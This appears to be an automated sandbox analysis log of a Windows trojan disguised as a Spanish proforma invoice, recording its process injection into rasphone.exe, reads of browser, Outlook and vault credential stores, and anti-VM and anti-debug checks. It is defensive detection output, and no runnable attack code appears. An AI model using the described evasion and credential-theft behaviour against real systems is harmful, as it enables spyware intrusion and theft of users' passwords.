Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.000000000657F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerasphone.exej% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/10@3/2
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_004049B1 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004049B1
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_004021CF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_004021CF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe File created: C:\Users\user\AppData\Local\Temp\nseB9BC.tmp
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe ReversingLabs: Detection: 21%
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe File read: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: unknown Process created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Process created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"
Source: C:\Windows\SysWOW64\rasphone.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: srvcli.dll
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: mswsock.dll
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: dnsapi.dll
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: iphlpapi.dll
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: rasadhlp.dll
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: militriskes.lnk.0.dr LNK file: ..\..\..\..\..\..\..\Transformationsmodeller.Tri12
Source: C:\Windows\SysWOW64\rasphone.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rasphone.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rasphone.pdbGCTL source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Data Obfuscation

Source: Yara match File source: 00000000.00000002.84200771924.0000000008C45000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.84398186443.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.84200771924.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.83100054536.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\Reorganisere.Cir, type: DROPPED
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_707E1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_707E1BFF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_707E30C0 push eax; ret 0_2_707E30EE
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367097A1 push es; iretd 2_2_367097A8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367021AD pushad ; retf 0004h 2_2_3670223F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367308CD push ecx; mov dword ptr [esp], ecx 2_2_367308D6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3643CF57 push ebx; rep ret 2_2_3643CF61
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36435496 pushad ; ret 2_2_364354A0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36445252 push eax; ret 2_2_36445254
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36436B87 push ebx; iretd 2_2_36436B9F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36441BA1 pushad ; ret 2_2_36441BA4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3643C86F push eax; ret 2_2_3643C870
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3643D01B push ebx; rep ret 2_2_3643CF61
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_006E886F push eax; ret 3_2_006E8870
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_006E901B push ebx; rep ret 3_2_006E8F61
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_006E1496 pushad ; ret 3_2_006E14A0
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_006F1252 push eax; ret 3_2_006F1254
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_006E1E18 pushad ; retf 3_2_006E1E19
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_006E1758 pushfd ; retf 3_2_006E1890
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_006E8F57 push ebx; rep ret 3_2_006E8F61
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_006EDBA1 pushad ; ret 3_2_006EDBA4
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_006E2B87 push ebx; iretd 3_2_006E2B9F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_04918801 pushad ; retf 3_2_04918802
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_04927C3B push eax; ret 3_2_04927C3D
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_0492458A pushad ; ret 3_2_0492458D
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_0491F940 push ebx; rep ret 3_2_0491F94A
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_04919570 push ebx; iretd 3_2_04919588
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_0491FA04 push ebx; rep ret 3_2_0491F94A
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_0491F258 push eax; ret 3_2_0491F259
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 3_2_04917E7F pushad ; ret 3_2_04917E89
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_048408CD push ecx; mov dword ptr [esp], ecx 4_2_048408D6
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04C15496 pushad ; ret 4_2_04C154A0
Source: C:\Windows\SysWOW64\rasphone.exe Code function: 4_2_04C1D01B push ebx; rep ret 4_2_04C1CF61
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe File created: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe File created: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dll Jump to dropped file
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe API/Special instruction interceptor: Address: 8ECAE36
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe API/Special instruction interceptor: Address: 567AE36
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe API/Special instruction interceptor: Address: 7FF8F0B90594
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe API/Special instruction interceptor: Address: 7FF8F0B8FF74
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe API/Special instruction interceptor: Address: 7FF8F0B8D6C4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe API/Special instruction interceptor: Address: 7FF8F0B8D864
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe API/Special instruction interceptor: Address: 7FF8F0B8D004
Source: C:\Windows\SysWOW64\rasphone.exe API/Special instruction interceptor: Address: 7FF8F0B8D144
Source: C:\Windows\SysWOW64\rasphone.exe API/Special instruction interceptor: Address: 7FF8F0B90594
Source: C:\Windows\SysWOW64\rasphone.exe API/Special instruction interceptor: Address: 7FF8F0B8D764
Source: C:\Windows\SysWOW64\rasphone.exe API/Special instruction interceptor: Address: 7FF8F0B8D324
Source: C:\Windows\SysWOW64\rasphone.exe API/Special instruction interceptor: Address: 7FF8F0B8D364
Source: C:\Windows\SysWOW64\rasphone.exe API/Special instruction interceptor: Address: 7FF8F0B8D004
Source: C:\Windows\SysWOW64\rasphone.exe API/Special instruction interceptor: Address: 7FF8F0B8FF74
Source: C:\Windows\SysWOW64\rasphone.exe API/Special instruction interceptor: Address: 7FF8F0B8D6C4
Source: C:\Windows\SysWOW64\rasphone.exe API/Special instruction interceptor: Address: 7FF8F0B8D864
Source: C:\Windows\SysWOW64\rasphone.exe API/Special instruction interceptor: Address: 7FF8F0B8D604
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36771763 rdtsc 2_2_36771763
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dll Jump to dropped file
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe API coverage: 0.4 %
Source: C:\Windows\SysWOW64\rasphone.exe API coverage: 1.2 %
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 1076 Thread sleep count: 69 > 30 Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 1076 Thread sleep time: -345000s >= -30000s Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C4D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_00402930 FindFirstFileW, 0_2_00402930
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_0040689E FindFirstFileW,FindClose, 0_2_0040689E
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84315348037.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006569000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWs
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84315348037.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006569000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: RAVCpl64.exe, 00000003.00000002.88172888199.000000000068C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rasphone.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36771763 rdtsc 2_2_36771763
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_00401F03 LdrInitializeThunk,ShowWindow,EnableWindow, 0_2_00401F03
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_707E1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_707E1BFF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36730670 mov eax, dword ptr fs:[00000030h] 2_2_36730670
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36772670 mov eax, dword ptr fs:[00000030h] 2_2_36772670
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36727662 mov eax, dword ptr fs:[00000030h] 2_2_36727662
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36743660 mov eax, dword ptr fs:[00000030h] 2_2_36743660
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367B166E mov eax, dword ptr fs:[00000030h] 2_2_367B166E
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676666D mov esi, dword ptr fs:[00000030h] 2_2_3676666D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676666D mov eax, dword ptr fs:[00000030h] 2_2_3676666D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36765654 mov eax, dword ptr fs:[00000030h] 2_2_36765654
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3673965A mov eax, dword ptr fs:[00000030h] 2_2_3673965A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676265C mov eax, dword ptr fs:[00000030h] 2_2_3676265C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676265C mov ecx, dword ptr fs:[00000030h] 2_2_3676265C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36733640 mov eax, dword ptr fs:[00000030h] 2_2_36733640
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3674F640 mov eax, dword ptr fs:[00000030h] 2_2_3674F640
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676C640 mov eax, dword ptr fs:[00000030h] 2_2_3676C640
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3672D64A mov eax, dword ptr fs:[00000030h] 2_2_3672D64A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36730630 mov eax, dword ptr fs:[00000030h] 2_2_36730630
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36760630 mov eax, dword ptr fs:[00000030h] 2_2_36760630
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367B8633 mov esi, dword ptr fs:[00000030h] 2_2_367B8633
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367B8633 mov eax, dword ptr fs:[00000030h] 2_2_367B8633
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_3676F63F mov eax, dword ptr fs:[00000030h] 2_2_3676F63F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_36737623 mov eax, dword ptr fs:[00000030h] 2_2_36737623
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DD62C mov ecx, dword ptr fs:[00000030h] 2_2_367DD62C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 2_2_367DD62C mov eax, dword ptr fs:[00000030h] 2_2_367DD62C
